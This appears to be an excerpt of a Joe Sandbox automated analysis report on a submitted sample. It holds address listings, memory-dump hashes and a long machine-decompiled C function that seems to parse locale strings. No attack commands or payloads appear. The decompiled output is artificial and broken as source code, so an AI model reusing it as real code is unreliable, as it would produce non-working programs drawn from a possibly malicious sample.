                    0x00440ea0
                    0x00440ea4
                    0x00440eba
                    0x00440f6b
                    0x00440f6b
                    0x00440f70
                    0x00440f73
                    0x00000000
                    0x00440ecf
                    0x00440ed1
                    0x00000000
                    0x00000000
                    0x00440ed7
                    0x00440eda
                    0x00440eda
                    0x00440edd
                    0x00440ee3
                    0x00440ee7
                    0x00440ee7
                    0x00440ef9
                    0x00440eff
                    0x00440f02
                    0x00440f06
                    0x00000000
                    0x00000000
                    0x00440f2b
                    0x00000000
                    0x00000000
                    0x00440f31
                    0x00440f33
                    0x00440f38
                    0x00440f58
                    0x00440f5b
                    0x00440f5e
                    0x00440f63
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440f69
                    0x00440f3a
                    0x00440f3d
                    0x00440f3d
                    0x00440f41
                    0x00440f46
                    0x00000000
                    0x00000000
                    0x00440f4f
                    0x00440f50
                    0x00440f51
                    0x00440f56
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440f56
                    0x00000000
                    0x00440f3d
                    0x00000000
                    0x00440eda
                    0x00440eba
                    0x00440ea9
                    0x00000000
                    0x00000000
                    0x00440eaf
                    0x00440eaf
                    0x00000000
                    0x00440eaf
                    0x00440e2b
                    0x00440e51
                    0x00440e64
                    0x00440e68
                    0x00000000
                    0x00440e78
                    0x00440e80
                    0x00440e86
                    0x00440e86
                    0x00000000
                    0x00440e80
                    0x00440e68
                    0x00440e2d
                    0x00440e2f
                    0x00440e32
                    0x00440e37
                    0x00440e3a
                    0x00440e3a
                    0x00440e3e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440e3e
                    0x00440e43
                    0x00440e50
                    0x00440e50
                    0x00000000
                    0x00440e43
                    0x00440df1
                    0x00000000
                    0x00000000
                    0x00440dfc
                    0x00440e07
                    0x00440e0a
                    0x00440e0d
                    0x00440e13
                    0x00000000
                    0x00000000
                    0x00440e19
                    0x00440e1c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440e1e
                    0x00000000
                    0x00440dfc
                    0x00440dbb
                    0x00440dc1
                    0x00000000
                    0x00440dab
                    0x00440fea
                    0x00440ffa
                    0x00440ffa

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13456db2e60b6886018e1464db3921c06bd17bf41d2c1a7ae32211666381096f
                    • Instruction ID: 1d61169d7dda5efa958ccf872112ff651d8703c0022ad655da63804ab445c0b8
                    • Opcode Fuzzy Hash: 13456db2e60b6886018e1464db3921c06bd17bf41d2c1a7ae32211666381096f
                    • Instruction Fuzzy Hash: 9771F7319002169BEB31CF54C844ABFBB75FF45310F24053BEA1167281CBB89D6ACBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004446ED(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int _v56;
                    				char _v276;
                    				short _v278;
                    				short _v280;
                    				char _v448;
                    				signed int _v452;
                    				signed int _v456;
                    				short _v458;
                    				intOrPtr _v460;
                    				intOrPtr _v464;
                    				signed int _v468;
                    				signed int _v472;
                    				intOrPtr _v508;
                    				char _v536;
                    				signed int _v540;
                    				intOrPtr _v544;
                    				signed int _v556;
                    				char _v708;
                    				signed int _v712;
                    				signed int _v716;
                    				short _v718;
                    				signed int* _v720;
                    				signed int _v724;
                    				signed int _v728;
                    				signed int _v732;
                    				signed int* _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _v748;
                    				signed int _v752;
                    				char _v820;
                    				char _v1248;
                    				char _v1256;
                    				intOrPtr _v1276;
                    				signed int _v1292;
                    				signed int _t241;
                    				void* _t244;
                    				signed int _t247;
                    				signed int _t249;
                    				signed int _t255;
                    				signed int _t256;
                    				signed int _t257;
                    				signed int _t258;
                    				signed int _t259;
                    				signed int _t261;
                    				signed int _t263;
                    				void* _t265;
                    				signed int _t266;
                    				signed int _t267;
                    				signed int _t268;
                    				signed int _t270;
                    				signed int _t273;
                    				signed int _t280;
                    				signed int _t281;
                    				signed int _t282;
                    				intOrPtr _t283;
                    				signed int _t286;
                    				signed int _t290;
                    				signed int _t291;
                    				intOrPtr _t293;
                    				signed int _t296;
                    				signed int _t297;
                    				signed int _t299;
                    				signed int _t319;
                    				signed int _t320;
                    				signed int _t323;
                    				signed int _t328;
                    				void* _t330;
                    				signed int _t332;
                    				void* _t333;
                    				intOrPtr _t334;
                    				signed int _t339;
                    				signed int _t340;
                    				intOrPtr* _t343;
                    				signed int _t357;
                    				signed int _t359;
                    				signed int _t361;
                    				intOrPtr* _t362;
                    				signed int _t364;
                    				signed int _t370;
                    				intOrPtr* _t374;
                    				intOrPtr* _t377;
                    				void* _t380;
                    				intOrPtr* _t381;
                    				intOrPtr* _t382;
                    				signed int _t393;
                    				signed int _t396;
                    				intOrPtr* _t397;
                    				signed int _t399;
                    				signed int* _t403;
                    				intOrPtr* _t410;
                    				intOrPtr* _t411;
                    				signed int _t421;
                    				short _t422;
                    				void* _t424;
                    				signed int _t425;
                    				signed int _t427;
                    				intOrPtr _t428;
                    				signed int _t431;
                    				intOrPtr _t432;
                    				signed int _t434;
                    				signed int _t437;
                    				intOrPtr _t443;
                    				signed int _t444;
                    				signed int _t446;
                    				signed int _t447;
                    				signed int _t450;
                    				signed int _t452;
                    				signed int _t456;
                    				signed int* _t457;
                    				intOrPtr* _t458;
                    				short _t459;
                    				void* _t461;
                    				signed int _t463;
                    				signed int _t465;
                    				void* _t467;
                    				void* _t468;
                    				void* _t470;
                    				signed int _t471;
                    				void* _t472;
                    				void* _t474;
                    				signed int _t475;
                    				void* _t477;
                    				void* _t479;
                    				intOrPtr _t491;
                    
                    				_t420 = __edx;
                    				_t461 = _t467;
                    				_t468 = _t467 - 0xc;
                    				_push(__ebx);
                    				_push(__esi);
                    				_v12 = 1;
                    				_t357 = E00445B29(__ecx, 0x6a6);
                    				_t240 = 0;
                    				_pop(_t370);
                    				if(_t357 == 0) {
                    					L20:
                    					return _t240;
                    				} else {
                    					_push(__edi);
                    					_t2 = _t357 + 4; // 0x4
                    					_t427 = _t2;
                    					 *_t427 = 0;
                    					 *_t357 = 1;
                    					_t443 = _a4;
                    					_t4 = _t443 + 0x30; // 0x443eec
                    					_t241 = _t4;
                    					_push( *_t241);
                    					_v16 = _t241;
                    					_push(0x45c590);
                    					_push( *0x45c44c);
                    					E0044462C(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                    					_t470 = _t468 + 0x18;
                    					_v8 = 0x45c44c;
                    					while(1) {
                    						L2:
                    						_t244 = E0044F997(_t427, 0x351, ";");
                    						_t471 = _t470 + 0xc;
                    						if(_t244 != 0) {
                    							break;
                    						} else {
                    							_t8 = _v16 + 0x10; // 0x10
                    							_t410 = _t8;
                    							_t339 =  *_v16;
                    							_v16 = _t410;
                    							_t411 =  *_t410;
                    							goto L4;
                    						}
                    						while(1) {
                    							L4:
                    							_t420 =  *_t339;
                    							if(_t420 !=  *_t411) {
                    								break;
                    							}
                    							if(_t420 == 0) {
                    								L8:
                    								_t340 = 0;
                    							} else {
                    								_t420 =  *((intOrPtr*)(_t339 + 2));
                    								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                    									break;
                    								} else {
                    									_t339 = _t339 + 4;
                    									_t411 = _t411 + 4;
                    									if(_t420 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							asm("sbb eax, eax");
                    							_t370 = _v8 + 0xc;
                    							_v8 = _t370;
                    							_v12 = _v12 &  !( ~_t340);
                    							_t343 = _v16;
                    							_v16 = _t343;
                    							_push( *_t343);
                    							_push(0x45c590);
                    							_push( *_t370);
                    							E0044462C(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                    							_t470 = _t471 + 0x18;
                    							if(_v8 < 0x45c47c) {
                    								goto L2;
                    							} else {
                    								if(_v12 != 0) {
                    									E00446172(_t357);
                    									_t31 = _t443 + 0x28; // 0x30ff068b
                    									_t434 = _t427 | 0xffffffff;
                    									__eflags =  *_t31;
                    									if(__eflags != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(__eflags == 0) {
                    											_t32 = _t443 + 0x28; // 0x30ff068b
                    											E00446172( *_t32);
                    										}
                    									}
                    									_t33 = _t443 + 0x24; // 0x30ff0c46
                    									__eflags =  *_t33;
                    									if( *_t33 != 0) {
                    										asm("lock xadd [eax], edi");
                    										__eflags = _t434 == 1;
                    										if(_t434 == 1) {
                    											_t34 = _t443 + 0x24; // 0x30ff0c46
                    											E00446172( *_t34);
                    										}
                    									}
                    									 *(_t443 + 0x24) = 0;
                    									 *(_t443 + 0x1c) = 0;
                    									 *(_t443 + 0x28) = 0;
                    									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                    									_t39 = _t443 + 0x40; // 0x10468b00
                    									_t240 =  *_t39;
                    								} else {
                    									_t20 = _t443 + 0x28; // 0x30ff068b
                    									_t437 = _t427 | 0xffffffff;
                    									_t491 =  *_t20;
                    									if(_t491 != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(_t491 == 0) {
                    											_t21 = _t443 + 0x28; // 0x30ff068b
                    											E00446172( *_t21);
                    										}
                    									}
                    									_t22 = _t443 + 0x24; // 0x30ff0c46
                    									if( *_t22 != 0) {
                    										asm("lock xadd [eax], edi");
                    										if(_t437 == 1) {
                    											_t23 = _t443 + 0x24; // 0x30ff0c46
                    											E00446172( *_t23);
                    										}
                    									}
                    									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                    									_t26 = _t357 + 4; // 0x4
                    									_t240 = _t26;
                    									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                    									 *(_t443 + 0x28) = _t357;
                    									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                    								}
                    								goto L20;
                    							}
                    							goto L130;
                    						}
                    						asm("sbb eax, eax");
                    						_t340 = _t339 | 0x00000001;
                    						__eflags = _t340;
                    						goto L10;
                    					}
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043B6DD();
                    					asm("int3");
                    					_push(_t461);
                    					_t463 = _t471;
                    					_t472 = _t471 - 0x1d0;
                    					_t247 =  *0x47000c; // 0xc3a97826
                    					_v56 = _t247 ^ _t463;
                    					_t249 = _v40;
                    					_push(_t357);
                    					_push(_t443);
                    					_t444 = _v36;
                    					_push(_t427);
                    					_t428 = _v44;
                    					_v508 = _t428;
                    					__eflags = _t249;
                    					if(_t249 == 0) {
                    						_v456 = 1;
                    						_v468 = 0;
                    						_t359 = 0;
                    						_v452 = 0;
                    						__eflags = _t444;
                    						if(__eflags == 0) {
                    							L79:
                    							E004446ED(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                    							goto L80;
                    						} else {
                    							__eflags =  *_t444 - 0x4c;
                    							if( *_t444 != 0x4c) {
                    								L58:
                    								_push(0);
                    								_t255 = E004442B5(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                    								_t474 = _t472 + 0x18;
                    								__eflags = _t255;
                    								if(_t255 != 0) {
                    									_t370 = 0;
                    									__eflags = 0;
                    									_t76 = _t428 + 0x20; // 0x443edc
                    									_t421 = _t76;
                    									_t446 = 0;
                    									_v452 = _t421;
                    									do {
                    										__eflags = _t446;
                    										if(_t446 == 0) {
                    											L73:
                    											_t256 = _v456;
                    										} else {
                    											_t374 =  *_t421;
                    											_t257 =  &_v276;
                    											while(1) {
                    												__eflags =  *_t257 -  *_t374;
                    												_t428 = _v464;
                    												if( *_t257 !=  *_t374) {
                    													break;
                    												}
                    												__eflags =  *_t257;
                    												if( *_t257 == 0) {
                    													L66:
                    													_t370 = 0;
                    													_t258 = 0;
                    												} else {
                    													_t422 =  *((intOrPtr*)(_t257 + 2));
                    													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                    													_v458 = _t422;
                    													_t421 = _v452;
                    													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                    														break;
                    													} else {
                    														_t257 = _t257 + 4;
                    														_t374 = _t374 + 4;
                    														__eflags = _v458;
                    														if(_v458 != 0) {
                    															continue;
                    														} else {
                    															goto L66;
                    														}
                    													}
                    												}
                    												L68:
                    												__eflags = _t258;
                    												if(_t258 == 0) {
                    													_t359 = _t359 + 1;
                    													__eflags = _t359;
                    													goto L73;
                    												} else {
                    													_t259 =  &_v276;
                    													_push(_t259);
                    													_push(_t446);
                    													_push(_t428);
                    													L83();
                    													_t421 = _v452;
                    													_t474 = _t474 + 0xc;
                    													__eflags = _t259;
                    													if(_t259 == 0) {
                    														_t370 = 0;
                    														_t256 = 0;
                    														_v456 = 0;
                    													} else {
                    														_t359 = _t359 + 1;
                    														_t370 = 0;
                    														goto L73;
                    													}
                    												}
                    												goto L74;
                    											}
                    											asm("sbb eax, eax");
                    											_t258 = _t257 | 0x00000001;
                    											_t370 = 0;
                    											__eflags = 0;
                    											goto L68;
                    										}
                    										L74:
                    										_t446 = _t446 + 1;
                    										_t421 = _t421 + 0x10;
                    										_v452 = _t421;
                    										__eflags = _t446 - 5;
                    									} while (_t446 <= 5);
                    									__eflags = _t256;
                    									if(__eflags != 0) {
                    										goto L79;
                    									} else {
                    										__eflags = _t359;
                    										goto L77;
                    									}
                    								}
                    								goto L80;
                    							} else {
                    								__eflags =  *(_t444 + 2) - 0x43;
                    								if( *(_t444 + 2) != 0x43) {
                    									goto L58;
                    								} else {
                    									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                    									if( *((short*)(_t444 + 4)) != 0x5f) {
                    										goto L58;
                    									} else {
                    										while(1) {
                    											_t261 = E00450AF7(_t444, 0x45c588);
                    											_t361 = _t261;
                    											_v472 = _t361;
                    											_pop(_t376);
                    											__eflags = _t361;
                    											if(_t361 == 0) {
                    												break;
                    											}
                    											_t263 = _t261 - _t444;
                    											__eflags = _t263;
                    											_v456 = _t263 >> 1;
                    											if(_t263 == 0) {
                    												break;
                    											} else {
                    												_t265 = 0x3b;
                    												__eflags =  *_t361 - _t265;
                    												if( *_t361 == _t265) {
                    													break;
                    												} else {
                    													_t431 = _v456;
                    													_t362 = 0x45c44c;
                    													_v460 = 1;
                    													do {
                    														_t266 = E00450ABD( *_t362, _t444, _t431);
                    														_t472 = _t472 + 0xc;
                    														__eflags = _t266;
                    														if(_t266 != 0) {
                    															goto L45;
                    														} else {
                    															_t377 =  *_t362;
                    															_t420 = _t377 + 2;
                    															do {
                    																_t334 =  *_t377;
                    																_t377 = _t377 + 2;
                    																__eflags = _t334 - _v468;
                    															} while (_t334 != _v468);
                    															_t376 = _t377 - _t420 >> 1;
                    															__eflags = _t431 - _t377 - _t420 >> 1;
                    															if(_t431 != _t377 - _t420 >> 1) {
                    																goto L45;
                    															}
                    														}
                    														break;
                    														L45:
                    														_v460 = _v460 + 1;
                    														_t362 = _t362 + 0xc;
                    														__eflags = _t362 - 0x45c47c;
                    													} while (_t362 <= 0x45c47c);
                    													_t359 = _v472 + 2;
                    													_t267 = E00450A6D(_t376, _t359, ";");
                    													_t428 = _v464;
                    													_t447 = _t267;
                    													_pop(_t380);
                    													__eflags = _t447;
                    													if(_t447 != 0) {
                    														L48:
                    														__eflags = _v460 - 5;
                    														if(_v460 > 5) {
                    															_t268 = _v452;
                    															goto L54;
                    														} else {
                    															_push(_t447);
                    															_t270 = E0044FAD9(_t380,  &_v276, 0x83, _t359);
                    															_t475 = _t472 + 0x10;
                    															__eflags = _t270;
                    															if(_t270 != 0) {
                    																L82:
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																E0043B6DD();
                    																asm("int3");
                    																_push(_t463);
                    																_t465 = _t475;
                    																_t273 =  *0x47000c; // 0xc3a97826
                    																_v556 = _t273 ^ _t465;
                    																_push(_t359);
                    																_t364 = _v540;
                    																_push(_t447);
                    																_push(_t428);
                    																_t432 = _v544;
                    																_v1292 = _t364;
                    																_v1276 = E00447C05(_t364, _t380, _t420) + 0x278;
                    																_push( &_v1256);
                    																_t280 = E004442B5(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                    																_t477 = _t475 - 0x2e4 + 0x18;
                    																__eflags = _t280;
                    																if(_t280 != 0) {
                    																	_t101 = _t364 + 2; // 0x6
                    																	_t450 = _t101 << 4;
                    																	__eflags = _t450;
                    																	_t281 =  &_v280;
                    																	_v724 = _t450;
                    																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                    																	while(1) {
                    																		_v712 = _v712 & 0x00000000;
                    																		__eflags =  *_t281 -  *_t381;
                    																		_t452 = _v724;
                    																		if( *_t281 !=  *_t381) {
                    																			break;
                    																		}
                    																		__eflags =  *_t281;
                    																		if( *_t281 == 0) {
                    																			L91:
                    																			_t282 = _v712;
                    																		} else {
                    																			_t459 =  *((intOrPtr*)(_t281 + 2));
                    																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                    																			_v718 = _t459;
                    																			_t452 = _v724;
                    																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                    																				break;
                    																			} else {
                    																				_t281 = _t281 + 4;
                    																				_t381 = _t381 + 4;
                    																				__eflags = _v718;
                    																				if(_v718 != 0) {
                    																					continue;
                    																				} else {
                    																					goto L91;
                    																				}
                    																			}
                    																		}
                    																		L93:
                    																		__eflags = _t282;
                    																		if(_t282 != 0) {
                    																			_t382 =  &_v280;
                    																			_t424 = _t382 + 2;
                    																			do {
                    																				_t283 =  *_t382;
                    																				_t382 = _t382 + 2;
                    																				__eflags = _t283 - _v712;
                    																			} while (_t283 != _v712);
                    																			_v728 = (_t382 - _t424 >> 1) + 1;
                    																			_t286 = E00445B29(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                    																			_v740 = _t286;
                    																			__eflags = _t286;
                    																			if(_t286 == 0) {
                    																				goto L84;
                    																			} else {
                    																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                    																				_t125 = _t364 * 4; // 0xcf42
                    																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                    																				_t128 = _t432 + 8; // 0x8b56ff8b
                    																				_v748 =  *_t128;
                    																				_t391 =  &_v280;
                    																				_v720 = _t286 + 4;
                    																				_t290 = E00447551(_t286 + 4, _v728,  &_v280);
                    																				_t479 = _t477 + 0xc;
                    																				__eflags = _t290;
                    																				if(_t290 != 0) {
                    																					_t291 = _v712;
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					E0043B6DD();
                    																					asm("int3");
                    																					_t293 =  *0x471518; // 0x0
                    																					return _t293;
                    																				} else {
                    																					__eflags = _v280 - 0x43;
                    																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                    																					if(_v280 != 0x43) {
                    																						L102:
                    																						_t296 = E00443FC2(_t364, _t391, _t432,  &_v708);
                    																						_t393 = _v712;
                    																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                    																					} else {
                    																						__eflags = _v278;
                    																						if(_v278 != 0) {
                    																							goto L102;
                    																						} else {
                    																							_t393 = _v712;
                    																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                    																						}
                    																					}
                    																					__eflags = _t364 - 2;
                    																					if(_t364 != 2) {
                    																						__eflags = _t364 - 1;
                    																						if(_t364 != 1) {
                    																							__eflags = _t364 - 5;
                    																							if(_t364 == 5) {
                    																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                    																							}
                    																						} else {
                    																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                    																						}
                    																					} else {
                    																						_t457 = _v736;
                    																						_t425 = _t393;
                    																						_t403 = _t457;
                    																						 *(_t432 + 8) = _v716;
                    																						_v720 = _t457;
                    																						_v728 = _t457[8];
                    																						_v716 = _t457[9];
                    																						while(1) {
                    																							_t154 = _t432 + 8; // 0x8b56ff8b
                    																							__eflags =  *_t154 -  *_t403;
                    																							if( *_t154 ==  *_t403) {
                    																								break;
                    																							}
                    																							_t458 = _v720;
                    																							_t425 = _t425 + 1;
                    																							_t328 =  *_t403;
                    																							 *_t458 = _v728;
                    																							_v716 = _t403[1];
                    																							_t403 = _t458 + 8;
                    																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                    																							_t364 = _v752;
                    																							_t457 = _v736;
                    																							_v728 = _t328;
                    																							_v720 = _t403;
                    																							__eflags = _t425 - 5;
                    																							if(_t425 < 5) {
                    																								continue;
                    																							} else {
                    																							}
                    																							L110:
                    																							__eflags = _t425 - 5;
                    																							if(__eflags == 0) {
                    																								_t178 = _t432 + 8; // 0x8b56ff8b
                    																								_t319 = E00450B3C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x45c508, 0x7f,  &_v536,  *_t178, 1);
                    																								_t479 = _t479 + 0x1c;
                    																								__eflags = _t319;
                    																								_t320 = _v712;
                    																								if(_t319 == 0) {
                    																									_t457[1] = _t320;
                    																								} else {
                    																									do {
                    																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                    																										_t320 = _t320 + 1;
                    																										__eflags = _t320 - 0x7f;
                    																									} while (_t320 < 0x7f);
                    																									_t323 = E004369FA( &_v536,  *0x470170, 0xfe);
                    																									_t479 = _t479 + 0xc;
                    																									__eflags = _t323;
                    																									_t457[1] = 0 | _t323 == 0x00000000;
                    																								}
                    																								_t193 = _t432 + 8; // 0x8b56ff8b
                    																								 *_t457 =  *_t193;
                    																							}
                    																							 *(_t432 + 0x18) = _t457[1];
                    																							goto L121;
                    																						}
                    																						__eflags = _t425;
                    																						if(_t425 != 0) {
                    																							 *_t457 =  *(_t457 + _t425 * 8);
                    																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                    																							 *(_t457 + _t425 * 8) = _v728;
                    																							 *(_t457 + 4 + _t425 * 8) = _v716;
                    																						}
                    																						goto L110;
                    																					}
                    																					L121:
                    																					_t297 = _t364 * 0xc;
                    																					_t200 = _t297 + 0x45c448; // 0x410209
                    																					 *0x4584ec(_t432);
                    																					_t299 =  *((intOrPtr*)( *_t200))();
                    																					_t396 = _v732;
                    																					__eflags = _t299;
                    																					if(_t299 == 0) {
                    																						__eflags = _t396 - 0x4702a8;
                    																						if(_t396 != 0x4702a8) {
                    																							_t456 = _t364 + _t364;
                    																							__eflags = _t456;
                    																							asm("lock xadd [eax], ecx");
                    																							if(_t456 != 0) {
                    																								goto L126;
                    																							} else {
                    																								_t218 = _t456 * 8; // 0x30ff068b
                    																								E00446172( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                    																								_t221 = _t456 * 8; // 0x30ff0c46
                    																								E00446172( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                    																								_t224 = _t364 * 4; // 0xcf42
                    																								E00446172( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                    																								_t399 = _v712;
                    																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                    																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                    																							}
                    																						}
                    																						_t397 = _v740;
                    																						 *_t397 = 1;
                    																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                    																					} else {
                    																						 *(_v724 + _t432) = _t396;
                    																						_t205 = _t364 * 4; // 0xcf42
                    																						E00446172( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                    																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                    																						E00446172(_v740);
                    																						 *(_t432 + 8) = _v748;
                    																						goto L84;
                    																					}
                    																					goto L85;
                    																				}
                    																			}
                    																		} else {
                    																			goto L85;
                    																		}
                    																		goto L130;
                    																	}
                    																	asm("sbb eax, eax");
                    																	_t282 = _t281 | 0x00000001;
                    																	__eflags = _t282;
                    																	goto L93;
                    																} else {
                    																	L84:
                    																	__eflags = 0;
                    																	L85:
                    																	__eflags = _v16 ^ _t465;
                    																	return E004349BB(_v16 ^ _t465);
                    																}
                    															} else {
                    																_t330 = _t447 + _t447;
                    																__eflags = _t330 - 0x106;
                    																if(_t330 >= 0x106) {
                    																	E00434AEF();
                    																	goto L82;
                    																} else {
                    																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                    																	_t332 =  &_v276;
                    																	_push(_t332);
                    																	_push(_v460);
                    																	_push(_t428);
                    																	L83();
                    																	_t472 = _t475 + 0xc;
                    																	__eflags = _t332;
                    																	_t268 = _v452;
                    																	if(_t332 != 0) {
                    																		_t268 = _t268 + 1;
                    																		_v452 = _t268;
                    																	}
                    																	L54:
                    																	_t444 = _t359 + _t447 * 2;
                    																	_t370 = 0;
                    																	__eflags =  *_t444;
                    																	if( *_t444 == 0) {
                    																		L56:
                    																		__eflags = _t268;
                    																		L77:
                    																		if(__eflags != 0) {
                    																			goto L79;
                    																		} else {
                    																		}
                    																		goto L80;
                    																	} else {
                    																		_t444 = _t444 + 2;
                    																		__eflags =  *_t444;
                    																		if( *_t444 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L56;
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t333 = 0x3b;
                    														__eflags =  *_t359 - _t333;
                    														if( *_t359 != _t333) {
                    															break;
                    														} else {
                    															goto L48;
                    														}
                    													}
                    												}
                    											}
                    											goto L130;
                    										}
                    										goto L80;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t444;
                    						if(_t444 != 0) {
                    							_push(_t444);
                    							_push(_t249);
                    							_push(_t428);
                    							L83();
                    						}
                    						L80:
                    						__eflags = _v12 ^ _t463;
                    						return E004349BB(_v12 ^ _t463);
                    					}
                    				}
                    				L130:
                    			}






































































































































                    0x004446ed
                    0x004446f0
                    0x004446f2
                    0x004446f5
                    0x004446f6
                    0x004446ff
                    0x00444707
                    0x00444709
                    0x0044470b
                    0x0044470e
                    0x00444827
                    0x0044482c
                    0x00444714
                    0x00444714
                    0x00444715
                    0x00444715
                    0x00444718
                    0x0044471b
                    0x0044471d
                    0x00444720
                    0x00444720
                    0x00444723
                    0x00444725
                    0x00444728
                    0x0044472d
                    0x0044473b
                    0x00444745
                    0x00444748
                    0x0044474b
                    0x0044474b
                    0x00444756
                    0x0044475b
                    0x00444760
                    0x00000000
                    0x00444766
                    0x00444769
                    0x00444769
                    0x0044476c
                    0x0044476e
                    0x00444771
                    0x00444771
                    0x00444771
                    0x00444773
                    0x00444773
                    0x00444773
                    0x00444779
                    0x00000000
                    0x00000000
                    0x0044477e
                    0x00444795
                    0x00444795
                    0x00444780
                    0x00444780
                    0x00444788
                    0x00000000
                    0x0044478a
                    0x0044478a
                    0x0044478d
                    0x00444793
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444793
                    0x00444788
                    0x0044479e
                    0x004447a3
                    0x004447a5
                    0x004447aa
                    0x004447ad
                    0x004447b0
                    0x004447b3
                    0x004447b6
                    0x004447b8
                    0x004447bd
                    0x004447c7
                    0x004447cf
                    0x004447d7
                    0x00000000
                    0x004447dd
                    0x004447e1
                    0x0044482e
                    0x00444834
                    0x00444837
                    0x0044483a
                    0x0044483c
                    0x00444840
                    0x00444844
                    0x00444846
                    0x00444849
                    0x0044484e
                    0x00444844
                    0x0044484f
                    0x00444852
                    0x00444854
                    0x00444856
                    0x0044485a
                    0x0044485b
                    0x0044485d
                    0x00444860
                    0x00444865
                    0x0044485b
                    0x00444868
                    0x0044486b
                    0x0044486e
                    0x00444871
                    0x00444874
                    0x00444874
                    0x004447e3
                    0x004447e3
                    0x004447e6
                    0x004447e9
                    0x004447eb
                    0x004447ef
                    0x004447f3
                    0x004447f5
                    0x004447f8
                    0x004447fd
                    0x004447f3
                    0x004447fe
                    0x00444803
                    0x00444805
                    0x0044480a
                    0x0044480c
                    0x0044480f
                    0x00444814
                    0x0044480a
                    0x00444815
                    0x00444819
                    0x00444819
                    0x0044481c
                    0x00444820
                    0x00444823
                    0x00444823
                    0x00000000
                    0x00444826
                    0x00000000
                    0x004447d7
                    0x00444799
                    0x0044479b
                    0x0044479b
                    0x00000000
                    0x0044479b
                    0x0044487b
                    0x0044487c
                    0x0044487d
                    0x0044487e
                    0x0044487f
                    0x00444880
                    0x00444885
                    0x00444888
                    0x00444889
                    0x0044488b
                    0x00444891
                    0x00444898
                    0x0044489b
                    0x0044489e
                    0x0044489f
                    0x004448a0
                    0x004448a3
                    0x004448a4
                    0x004448a7
                    0x004448ad
                    0x004448af
                    0x004448d4
                    0x004448de
                    0x004448e4
                    0x004448e6
                    0x004448ec
                    0x004448ee
                    0x00444b41
                    0x00444b42
                    0x00000000
                    0x004448f4
                    0x004448f4
                    0x004448f8
                    0x00444a5f
                    0x00444a5f
                    0x00444a76
                    0x00444a7b
                    0x00444a7e
                    0x00444a80
                    0x00444a86
                    0x00444a86
                    0x00444a88
                    0x00444a88
                    0x00444a8b
                    0x00444a8d
                    0x00444a93
                    0x00444a93
                    0x00444a95
                    0x00444b1c
                    0x00444b1c
                    0x00444a9b
                    0x00444a9b
                    0x00444a9d
                    0x00444aa3
                    0x00444aa6
                    0x00444aa9
                    0x00444aaf
                    0x00000000
